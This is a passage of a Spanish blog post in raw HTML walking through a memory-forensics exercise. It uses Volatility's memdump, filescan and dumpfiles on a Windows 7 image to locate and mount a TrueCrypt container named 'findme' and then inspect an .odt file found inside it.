Plrl1iCtfGzKgdNtJ+PJBI+k6XaDoiyd3kKGT3OF86lmvzpYcbIpuLsfjk+8IZ3yhwhCrNGqKgOO
iYCzg2pqzTGBw7AikZXxN1eYsrRrnkbpGErpiCYhyiqKmcxTuE7lhTr6rrCBcZftGQxqmCQrhMNA
FVjTqFY1LapGqsPSqns+k7KckTTLmmllFVU13VnMWiEvA3O2vFqRN7TKTQw5zazwaeqeT7lrea6b
6xOKKgEGL+znqLoXKAiGauVilmpK48U0rHJ2RrVrR77Bc1S7SJEwsn4zFztnt6JGOJcD4pUqP/DN
Ry2QJnlfqS3tOtjeQ4k3DKptHw6XYTj4DK7geNoH2qqirSoaXMGZM5SL9KC47WcXOQWep5QCU8sp
tRxTzyn1nNLIKY2c0swpTd/TJ6pwiq8OU30vPzCFGpYdsGa9hX36v/EvAAAA//8DAFBLAwQUAAYA
CAAAACEAnGZGQbsAAAAkAQAAKgAAAGNsaXBib2FyZC9kcmF3aW5ncy9fcmVscy9kcmF3aW5nMS54
bWwucmVsc4SPzQrCMBCE74LvEPZu0noQkSa9iNCr1AcIyTYtNj8kUezbG+hFQfCyMLPsN7NN+7Iz
eWJMk3ccaloBQae8npzhcOsvuyOQlKXTcvYOOSyYoBXbTXPFWeZylMYpJFIoLnEYcw4nxpIa0cpE
fUBXNoOPVuYio2FBqrs0yPZVdWDxkwHii0k6zSF2ugbSL6Ek/2f7YZgUnr16WHT5RwTLpRcWoIwG
MwdKV2edNS1dgYmGff0m3gAAAP//AwBQSwECLQAUAAYACAAAACEAu+VIlAUBAAAeAgAAEwAAAAAA
AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQCtMD/xwQAAADIB
AAALAAAAAAAAAAAAAAAAADYBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBoZQ5/vgIAAF8G
AAAfAAAAAAAAAAAAAAAAACACAABjbGlwYm9hcmQvZHJhd2luZ3MvZHJhd2luZzEueG1sUEsBAi0A
FAAGAAgAAAAhAJJ9h+AdBwAASSAAABoAAAAAAAAAAAAAAAAAGwUAAGNsaXBib2FyZC90aGVtZS90
aGVtZTEueG1sUEsBAi0AFAAGAAgAAAAhAJxmRkG7AAAAJAEAACoAAAAAAAAAAAAAAAAAcAwAAGNs
aXBib2FyZC9kcmF3aW5ncy9fcmVscy9kcmF3aW5nMS54bWwucmVsc1BLBQYAAAAABQAFAGcBAABz
DQAAAAA=
" filled="f" strokecolor="red" strokeweight="1pt"/><![endif]--><!--[if !vml]--><span style="height: 11px; left: 0px; margin-left: -1px; margin-top: 9px; mso-ignore: vglayout; position: absolute; width: 329px; z-index: 251660288;"><br /></span><!--[endif]--></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgBbOpMIH9Em3CIvlkzyXAs_hmhxlIKwddru4dTZt4NemgHkd-5xuBdr29bldOdBb4EvzLbOmRXZ6o_03uWnc7xZm8Rj_gR9zdF87O9dbz0-EBUF-PQlk0Znfhxe1Mwo7Aly8F4ml84kNTc1yH01W0kltazKvrHc-kkcG2Vflz0qyEsB2qhm1gV9AsAGw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="179" data-original-width="1206" height="95" src="https://blogger.googleusercontent.com/img/a/AVvXsEgBbOpMIH9Em3CIvlkzyXAs_hmhxlIKwddru4dTZt4NemgHkd-5xuBdr29bldOdBb4EvzLbOmRXZ6o_03uWnc7xZm8Rj_gR9zdF87O9dbz0-EBUF-PQlk0Znfhxe1Mwo7Aly8F4ml84kNTc1yH01W0kltazKvrHc-kkcG2Vflz0qyEsB2qhm1gV9AsAGw=w640-h95" width="640" /></a></div><p></p>Gracias a truecryptsummary hemos obtenido la contraseña de cifrado, pero no tenemos ninguna referencia del archivo que contiene el volumen cifrado, es decir, del contenedor por lo que ahora comienza la búsqueda de la aguja en el pajar…<br /><br />Se me ocurrió que el archivo puede que estuviese en memoria en el momento en el que se realizó la captura por lo que vamos a volcar el área de memoria del proceso truecrypt.exe (pid 3224) y vamos a intentar escarbar en él haciendo uso de strings.<br /><br />vol.py -f dump --profile=Win7SP1x86_23418 memdump -p 3224 -D ./dir<br /><br />Como el cifrado, lo ha tenido que haber realizado algún usuario se me ocurrió filtrar por “Users” y echar un vistazo.<br /><br /> <br /><br />strings ./dir/3224 | grep Users<span lang="EN-US" style="mso-ansi-language: EN-US;"><p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhmsa9hE-ChskAApwfilFZmiISDdpC-BoMq2FP3Tlz2aG4r_IE1_XUUwFrLdWgN2ttXLZcea9IU6rbPyIAr667qptAK1tkxP_OwVrXHo_IOI6Xj9hQ2v4S959U4mAJe6Fn59u6xjnDnIAVEOuSoAsVZSpeGaqyS74G8DwI3KGRMtFqfBHMDP4xhf0cKAQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="475" data-original-width="1200" height="253" src="https://blogger.googleusercontent.com/img/a/AVvXsEhmsa9hE-ChskAApwfilFZmiISDdpC-BoMq2FP3Tlz2aG4r_IE1_XUUwFrLdWgN2ttXLZcea9IU6rbPyIAr667qptAK1tkxP_OwVrXHo_IOI6Xj9hQ2v4S959U4mAJe6Fn59u6xjnDnIAVEOuSoAsVZSpeGaqyS74G8DwI3KGRMtFqfBHMDP4xhf0cKAQ" width="640" /></a></div><br /><br /><p></p>
<p class="MsoNormal" style="text-align: justify;"><span style="mso-no-proof: yes;"><v:shapetype coordsize="21600,21600" filled="f" id="_x0000_t75" o:preferrelative="t" o:spt="75" path="m@4@5l@4@11@9@11@9@5xe" stroked="f">
<v:stroke joinstyle="miter">
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0">
<v:f eqn="sum @0 1 0">
<v:f eqn="sum 0 0 @1">
<v:f eqn="prod @2 1 2">
<v:f eqn="prod @3 21600 pixelWidth">
<v:f eqn="prod @3 21600 pixelHeight">
<v:f eqn="sum @0 0 1">
<v:f eqn="prod @6 1 2">
<v:f eqn="prod @7 21600 pixelWidth">
<v:f eqn="sum @8 21600 0">
<v:f eqn="prod @7 21600 pixelHeight">
<v:f eqn="sum @10 21600 0">
</v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:formulas>
<v:path gradientshapeok="t" o:connecttype="rect" o:extrusionok="f">
<o:lock aspectratio="t" v:ext="edit">
</o:lock></v:path></v:stroke></v:shapetype><v:shape id="Imagen_x0020_8" o:spid="_x0000_i1054" style="height: 165pt; mso-wrap-style: square; visibility: visible; width: 425.25pt;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image001.png">
</v:imagedata></v:shape></span><span lang="EN-US" style="mso-ansi-language: EN-US;"><o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;">De los datos obtenidos veo que
hay un archivo llamado “findme” justo antes del History.xml de TrueCrypt, ¿coincidencia?
Pues vamos a verlo.<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Primero comprobamos si ese
archivo se encuentra en memoria con el plugin filescan.<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;">vol.py -f dump --profile=Win7SP1x86_23418 filescan
| grep findme<o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="mso-no-proof: yes;"><v:shape id="Imagen_x0020_9" o:spid="_x0000_i1053" style="height: 38.25pt; mso-wrap-style: square; visibility: visible; width: 425.25pt;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image002.png">
</v:imagedata></v:shape></span><span lang="EN-US" style="mso-ansi-language: EN-US;"><o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><o:p> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEg5ec8tSEy3VDbkFjygAQcFWnENCSughpRFDKlooe4kESd07aOC0geHIv6kEGOlPdS6ASkfbwblqeHTgG5oBRMUpPx03SAnoU4bm49S9-cq9gXEjjKSsA-A0EHWea_JkLA15HBhxDJXm_cMycBU5sNikkx7kTH7QhZ9vUtkdCH-evNwJ7cO5eV-vR7GLQ" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img alt="" data-original-height="124" data-original-width="1207" height="66" src="https://blogger.googleusercontent.com/img/a/AVvXsEg5ec8tSEy3VDbkFjygAQcFWnENCSughpRFDKlooe4kESd07aOC0geHIv6kEGOlPdS6ASkfbwblqeHTgG5oBRMUpPx03SAnoU4bm49S9-cq9gXEjjKSsA-A0EHWea_JkLA15HBhxDJXm_cMycBU5sNikkx7kTH7QhZ9vUtkdCH-evNwJ7cO5eV-vR7GLQ=w640-h66" width="640" /></a><br /><br /></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Como ha habido suerte procedemos
a extraerlo mediante el plugin dumpfiles, pasándole por parámetros la dirección
física de la memoria en la que se aloja ese archivo.<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;">vol.py -f dump --profile=Win7SP1x86_23418
dumpfiles -Q 0x000000001ee20110 -D ./dir/<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhyzpY8_dZ-gYkEpPQBA-XKBg0_Zmvb1OYDorMrbFmk0SWtAW1BD-8M-G-QCaERZa0YriDnHU8FkmzKDFck7vvH6TyFSyCedymEt0ZE7yxYzrnrz6rEHRnw5OgaSTUmEIPieQvVEygCku-TK4KJvjO1_UGBRWXTGwmFSkoPspZxunSXQC6u40obsc6GRA" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="79" data-original-width="1203" height="42" src="https://blogger.googleusercontent.com/img/a/AVvXsEhyzpY8_dZ-gYkEpPQBA-XKBg0_Zmvb1OYDorMrbFmk0SWtAW1BD-8M-G-QCaERZa0YriDnHU8FkmzKDFck7vvH6TyFSyCedymEt0ZE7yxYzrnrz6rEHRnw5OgaSTUmEIPieQvVEygCku-TK4KJvjO1_UGBRWXTGwmFSkoPspZxunSXQC6u40obsc6GRA=w640-h42" width="640" /></a></div><br /><p></p>
<p class="MsoNormal" style="text-align: justify;"><span style="mso-no-proof: yes;"><v:shape id="Imagen_x0020_10" o:spid="_x0000_i1052" style="height: 23.25pt; mso-wrap-style: square; visibility: visible; width: 425.25pt;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image003.png">
</v:imagedata></v:shape></span><o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">El resultado del comando anterior
nos devuelve un archivo.dat (archivo de datos), es decir es el mismo archivo
“findme” solo que Volatility lo renombra de esta manera (<a href="https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#dumpfiles">https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#dumpfiles</a>).<o:p></o:p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhScauu8Z9VvXN9-Kl38KIbZ5di_aXBzVVeI4oavsDBJZM4N_OdRCZPVJawmPqpNT6D4lZgqRSlKLAl5rdeGNqxfmdTaEM6lqNaJ2exa3OBCZor-Jmd5NMS275kR1b-whk6sTifAYvRSIO9rulqL8pWFTsJNJjKphRotfqeI6nLvWepEDMt3qPBmCtnCA" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="96" data-original-width="1209" height="50" src="https://blogger.googleusercontent.com/img/a/AVvXsEhScauu8Z9VvXN9-Kl38KIbZ5di_aXBzVVeI4oavsDBJZM4N_OdRCZPVJawmPqpNT6D4lZgqRSlKLAl5rdeGNqxfmdTaEM6lqNaJ2exa3OBCZor-Jmd5NMS275kR1b-whk6sTifAYvRSIO9rulqL8pWFTsJNJjKphRotfqeI6nLvWepEDMt3qPBmCtnCA=w640-h50" width="640" /></a></div><p></p><p class="MsoNormal" style="text-align: justify;">Pasamos el archivo a la máquina
Windows con TrueCrypt instalado y montamos el mismo introduciéndole la
contraseña obtenida con el plugin “truecryptsummary”.<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><span style="mso-no-proof: yes;"><v:shape id="Imagen_x0020_12" o:spid="_x0000_i1050" style="height: 370.5pt; mso-wrap-style: square; visibility: visible; width: 421.5pt;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image005.png">
</v:imagedata></v:shape></span><span lang="EN-US" style="mso-ansi-language: EN-US;"><o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;"><o:p> </o:p></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhZbZk7zTDm8gRupYJAkFn8lTVtFfDc0nWKSk-JB_9Q0WLAPxW5gcR8QwjPigXFndLea6V8uei43hY5_MTdYvrSu3OImroOo-hZdWQS8lTb2WwSI52mOeVH_rfyrgISowWx-mkMJDZhGOXImMjVMshFLbKWshpXKMRQrKgOA64jBrvGnO8l9yqGPw_buw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="601" data-original-width="679" height="567" src="https://blogger.googleusercontent.com/img/a/AVvXsEhZbZk7zTDm8gRupYJAkFn8lTVtFfDc0nWKSk-JB_9Q0WLAPxW5gcR8QwjPigXFndLea6V8uei43hY5_MTdYvrSu3OImroOo-hZdWQS8lTb2WwSI52mOeVH_rfyrgISowWx-mkMJDZhGOXImMjVMshFLbKWshpXKMRQrKgOA64jBrvGnO8l9yqGPw_buw=w640-h567" width="640" /></a></div><br /><p></p>
<p class="MsoNormal" style="text-align: justify;">Una vez montado, nos dirigimos a
la unidad y descubriremos que hay 3 ficheros.<o:p></o:p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhrok34Ak3-iymNfkVqotZlSYWJBCWJ7aAAxlyyB53OtW1NV9kdfORNnLLSVj87ekejPmntz_uhOVxlxiy3tsyPLh4Mo0iZRBZk42XhS9Ogqv6DH5p4YgCFPqqc4xgZtgDGDCJ9KHGs_R1Ft18PbYRjy9zlEX6eyp1oN9DqtijP6JZ-6TjoNR1Dqh2aWw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="117" data-original-width="714" height="104" src="https://blogger.googleusercontent.com/img/a/AVvXsEhrok34Ak3-iymNfkVqotZlSYWJBCWJ7aAAxlyyB53OtW1NV9kdfORNnLLSVj87ekejPmntz_uhOVxlxiy3tsyPLh4Mo0iZRBZk42XhS9Ogqv6DH5p4YgCFPqqc4xgZtgDGDCJ9KHGs_R1Ft18PbYRjy9zlEX6eyp1oN9DqtijP6JZ-6TjoNR1Dqh2aWw=w640-h104" width="640" /></a></div><br />En el txt no hay nada… </span><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjH117_6Oz2pE06N6ubdHKySXMbMe-v_xRr1goR9Y8i-i7EfaZjv9ZLUdy5TGRu1hT2WXaQj5-sWWmUxdiKSm9FQqI2ZiKbRUinLHf_hY4MkFJOUGLkYqJQC14h7ThiuMzx9S7kKYxt3gsko1f-vGl-iFcIJxJkQOeOCBHQjWEltJgfyboqsrwdwy_E9g" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="208" data-original-width="339" height="392" src="https://blogger.googleusercontent.com/img/a/AVvXsEjH117_6Oz2pE06N6ubdHKySXMbMe-v_xRr1goR9Y8i-i7EfaZjv9ZLUdy5TGRu1hT2WXaQj5-sWWmUxdiKSm9FQqI2ZiKbRUinLHf_hY4MkFJOUGLkYqJQC14h7ThiuMzx9S7kKYxt3gsko1f-vGl-iFcIJxJkQOeOCBHQjWEltJgfyboqsrwdwy_E9g=w640-h392" width="640" /></a></div><br /><br /><span lang="EN-US" style="mso-ansi-language: EN-US;"><p></p>
<p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;">En la imagen tampoco…<o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="mso-no-proof: yes;"><v:shape id="Imagen_x0020_15" o:spid="_x0000_i1047" style="height: 174.75pt; mso-wrap-style: square; visibility: visible; width: 300pt;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:/Users/MrRobot/AppData/Local/Temp/msohtmlclip1/01/clip_image008.png">
</v:imagedata></v:shape></span><span lang="EN-US" style="mso-ansi-language: EN-US;"><o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span lang="EN-US" style="mso-ansi-language: EN-US;"><o:p> </o:p></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj0SrS34zTwenb5X7rvq4XPKl4-q196Zbr7Du9_fK56Q_Y0ulCO_LLS5PYLZWxOKItdwuzYNHbcy1te5XC0lgQvIn179U7AYAe68Yt3E1r40dIAQdv5qa3lI2_RxQHhYLFE6VEz_Zjn5ZRgbIkqcaCPWpVOFwpoGRPwoR-W9dwUsqZTGEDKNDBdus50fQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="365" data-original-width="625" height="374" src="https://blogger.googleusercontent.com/img/a/AVvXsEj0SrS34zTwenb5X7rvq4XPKl4-q196Zbr7Du9_fK56Q_Y0ulCO_LLS5PYLZWxOKItdwuzYNHbcy1te5XC0lgQvIn179U7AYAe68Yt3E1r40dIAQdv5qa3lI2_RxQHhYLFE6VEz_Zjn5ZRgbIkqcaCPWpVOFwpoGRPwoR-W9dwUsqZTGEDKNDBdus50fQ=w640-h374" width="640" /></a></div><br /><p></p>
<p class="MsoNormal" style="text-align: justify;">Sólo nos queda el .odt<o:p></o:p></p><p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgnvSGi0pck8VHRq5JPQMmX6rnVWYxTumCndUMqpKoC2W8fe0Gu9tgC3tBDWpwe1lvXhOkOroNYBaIa0ksvWQo74_J6Vq2fmKQfagt4zH27ctRL0WY-V_Oeqiob65mv4LaHwgzYpBDEUzOGx8I1OSgMOSjilAe7E4Jd3KnhWfkDKJKy7ZBj4xQUpHMOXQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="388" data-original-width="760" height="326" src="https://blogger.googleusercontent.com/img/a/AVvXsEgnvSGi0pck8VHRq5JPQMmX6rnVWYxTumCndUMqpKoC2W8fe0Gu9tgC3tBDWpwe1lvXhOkOroNYBaIa0ksvWQo74_J6Vq2fmKQfagt4zH27ctRL0WY-V_Oeqiob65mv4LaHwgzYpBDEUzOGx8I1OSgMOSjilAe7E4Jd3KnhWfkDKJKy7ZBj4xQUpHMOXQ=w640-h326" width="640" /></a></div><br />Una vez un alumno me comentó que
los archivos tanto *.odt como *.docx,
son como archivos comprimidos, por lo que se me ocurrió hacer una cosa.<p></p><p class="MsoNormal" style="text-align: justify;"><o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;">Abrimos ese archivo con Winrar
para ver qué es lo que tenía en su interior y, también, otro archivo *.odt mío
para compararlos a ver si había diferencias y aquí está el resultado:<o:p></o:p></p>
<p class="MsoNormal" style="text-align: justify;"><v:rect filled="f" id="Rectangle_x0020_39" o:gfxdata="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
2jK6wRMhfAZn0amoF1Hjsr5eK11qqadModeD0CrVaN3+kBZX9TXwzecGGpuZgsbeSdtv1hoQMiOU
tP0JDI3hMkogdoT65kI0gOOWkeTpC3+VzJJwIbeQCFOD66STZoOISMw9SqK2r7ZfuIHGOodo3aqr
kBA+WuXWIK18bMqB020n48kEj6TpdoOiLJ3eQoZPc4XzqWa/Olhxsim4ux+OT7whnfKHCEKs0aoq
A46JgLODamrNMYHDsCKRlfE3V5iytGueRukYSumIJiHKKoqZzFO4TuWFOvqusIFxl+0ZDGqYJCuE
w0AVWNOoVjUtqkaqw9Kqez6TspyRNMuaaWUVVTXdWcxaIS8Dc7a8WpE3tMpNDDnNrPBp6p5PuWt5
rpvrE4oqAQYv7OeouhcoCIZq5WKWakrjxTSscnZGtWtHvsFzVLtIkTCyfjMXO2e3okY4lwPilSo/
8M1HLZAmeV+pLe062N5DiTcMqm0fDpdhOPgMruB42gfaqqKtKhpcwZkzlIv0oLjtZxc5BZ6nlAJT
yym1HFPPKfWc0sgpjZzSzClN39MnqnCKrw5TfS8/MIUalh2wZr2Fffq/8S8AAAD//wMAUEsDBBQA
BgAIAAAAIQCcZkZBuwAAACQBAAAqAAAAY2xpcGJvYXJkL2RyYXdpbmdzL19yZWxzL2RyYXdpbmcx
LnhtbC5yZWxzhI/NCsIwEITvgu8Q9m7SehCRJr2I0KvUBwjJNi02PyRR7Nsb6EVB8LIws+w3s037
sjN5YkyTdxxqWgFBp7yenOFw6y+7I5CUpdNy9g45LJigFdtNc8VZ5nKUxikkUigucRhzDifGkhrR
ykR9QFc2g49W5iKjYUGquzTI9lV1YPGTAeKLSTrNIXa6BtIvoST/Z/thmBSevXpYdPlHBMulFxag
jAYzB0pXZ501LV2BiYZ9/SbeAAAA//8DAFBLAQItABQABgAIAAAAIQC75UiUBQEAAB4CAAATAAAA
AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAK0wP/HBAAAA
MgEAAAsAAAAAAAAAAAAAAAAANgEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhALt9YVXAAgAA
XgYAAB8AAAAAAAAAAAAAAAAAIAIAAGNsaXBib2FyZC9kcmF3aW5ncy9kcmF3aW5nMS54bWxQSwEC
LQAUAAYACAAAACEAkn2H4B0HAABJIAAAGgAAAAAAAAAAAAAAAAAdBQAAY2xpcGJvYXJkL3RoZW1l
L3RoZW1lMS54bWxQSwECLQAUAAYACAAAACEAnGZGQbsAAAAkAQAAKgAAAAAAAAAAAAAAAAByDAAA
Y2xpcGJvYXJkL2RyYXdpbmdzL19yZWxzL2RyYXdpbmcxLnhtbC5yZWxzUEsFBgAAAAAFAAUAZwEA
AHUNAAAAAA==
